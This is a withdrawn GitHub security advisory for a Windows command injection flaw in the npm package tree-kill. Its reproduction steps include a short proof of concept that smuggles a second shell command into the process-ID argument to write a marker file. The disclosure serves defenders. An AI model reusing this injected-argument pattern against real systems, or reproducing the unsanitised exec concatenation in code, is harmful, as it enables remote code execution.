GHSA-mxq6-vrrr-ppmg – tree-kill

Package

Manager: npm
Name: tree-kill
Vulnerable Version: <0

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: N/A

EPSS: N/A pctlN/A

Details

Duplicate Advisory: tree-kill vulnerable to remote code execution ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-884p-74jh-xrg2. Ths link is maintained to preserve external references. ## Original Description A Code Injection exists in tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command, which is executed without any check. The issue arises here: `https://github.com/pkrumins/node-tree-kill/blob/master/index.js#L20` . While the Linux part is sanitized, the Windows on simply uses the `+` operand to concatenate the input into `exec()` ### Steps To Reproduce: Create the following PoC file: ```js // poc.js var kill = require('tree-kill'); kill('3333332 & echo "HACKED" > HACKED.txt & '); ``` Execute the following commands in another terminal: ```bash npm i tree-kill # Install affected module dir # Check *HACKED.txt* doesn't exist node poc.js # Run the PoC dir # Now *HACKED.txt* exists :) ``` A new file called `HACKED.txt` will be created, containing the `HACKED` string.

Metadata

Created: 2022-05-24T17:04:00Z
Modified: 2023-11-08T20:03:29Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-mxq6-vrrr-ppmg/GHSA-mxq6-vrrr-ppmg.json
CWE IDs: ["CWE-94"]
Alternative ID: N/A
Finding: N/A
Auto approve: 0